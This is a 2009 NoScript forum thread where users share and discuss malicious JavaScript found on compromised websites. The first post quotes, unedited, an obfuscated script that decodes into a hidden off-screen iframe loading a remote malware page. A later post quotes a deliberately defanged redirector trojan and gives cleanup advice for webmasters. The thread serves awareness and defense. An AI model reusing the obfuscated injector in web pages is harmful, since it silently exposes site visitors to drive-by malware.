Need NoScript like never before....

General discussion about the NoScript extension for Firefox
User avatar
therube
Ambassador
Posts: 7528
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: Need NoScript like never before....

Post by therube » Thu Jun 18, 2009 8:28 pm

Nothing new there. Another day, another exploit.

Code: Select all

<script type="text/javascript">var hdOruVsHnKBXZuvtsRmw = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z116z112z58z47z47z114z110z119z46z107z122z47z105z110z100z101z120z46z112z104z112z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z59z32z102z105z108z116z101z114z58z112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z111z102z116z46z65z108z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z114z97z109z101z62";var kWiFaYwHrXtZBIQvdJDR = hdOruVsHnKBXZuvtsRmw.split("z");var TEptzkmsBZolwWqWunem = "";for (var KYLMhcILlLcFQRyPBlHD=1; KYLMhcILlLcFQRyPBlHD<kWiFaYwHrXtZBIQvdJDR.length; KYLMhcILlLcFQRyPBlHD++){TEptzkmsBZolwWqWunem+=String.fromCharCode(kWiFaYwHrXtZBIQvdJDR[KYLMhcILlLcFQRyPBlHD]);}document.write(TEptzkmsBZolwWqWunem)</script>


Google/Safe Browsing/stopbadware.org/FF looks to have an OK handle on this one.

Sun of a gun. Got redirected to Ask.com !

Again mentioned at AVAST, http://forum.avast.com/index.php?&topic=45133.0

Heh, because I'm messing with FF I've forgotten that it has this "Safe Web" stuff built-in.
I must say, while certainly not foolproof, this built-in FF stuff can go a long way to keeping the unwary safer.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1pre) Gecko/20090618 SeaMonkey/2.0b1pre

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Need NoScript like never before....

Post by Tom T. » Fri Jun 19, 2009 7:59 am

Another good reason not to use AOL or Adobe Reader, or if you *must* use Adobe, at least disable javascript support, and whatever other executable support they've added since I dumped it a long time ago.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US at an expert level; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 diehard

luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Re: Need NoScript like never before....

Post by luntrus » Mon Jun 29, 2009 10:20 pm

Hi NoScript users,

Another reason to be grateful for having NS inside Fx or Flock, On the first link to the site below that I checked for malcode I get this with Bad Stuff Detektor: (Level: 1) Url checked: (frame source)
hxtp://www.autopilotprofits.com/\+yt+\
Blank page / could not connect
No ad codes identified

And immediately it is BINGO- this is the (HEAVILY EDITED BY ME for security reasons) suspicious JS-code in question:

Code: Select all

^!--
window.status = ' ';.........
sdf = "iuuq$2@..vvv/rsurngu/bnl.bfh,cho.mxsd/bfh.kwl.q`bj`fd.fn^inldq`fd/iulm$2Gq`bj^he$2E4020$37`gg^he$2E0050";yt="";v*r length=sdf.length;for(i=0;i<length;i++){yt+=String.fromCh*rCode(sdf.ch*rCodeAt(i)^1);}yt=unesc*pe(yt);
document.writeln("<FR*MESET BORDER=\"0\" FR*MEBORDER=\"0\" FR*MESPACING=\"0\" R0WS=\"100%,0\\*\"^");
document.writeln("<frame fr*meBorder=\"0\" fr*meSpacing=\"0\" m*rginHeight=\"0\" marginWidth=\"0\" scrolling=\"yes\" n*me=\"m*ster\" noresize src=\""+yt+"\"^");
document.writeln(^\/FR*MESET^");
//--^

And webmasters?

You may have noticed that when you take down all your webpages from your server and put up backup-files there, this nasty trojan, known as JS-Redirector-V [Trj] will have reinfected your pages within the upcoming next 6 hours.

How to sove this problem?
Well this is easy peasy: change the ftp-server password . When you have done this take all infected pages from the server and then change with the backup. Upload all and your trojan will be gone- your visitors can again safely visit your site! There are only a couple of av's that flag it, and NoScript to block it,

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Iron/3.0.189.0 Safari/531.0

Post Reply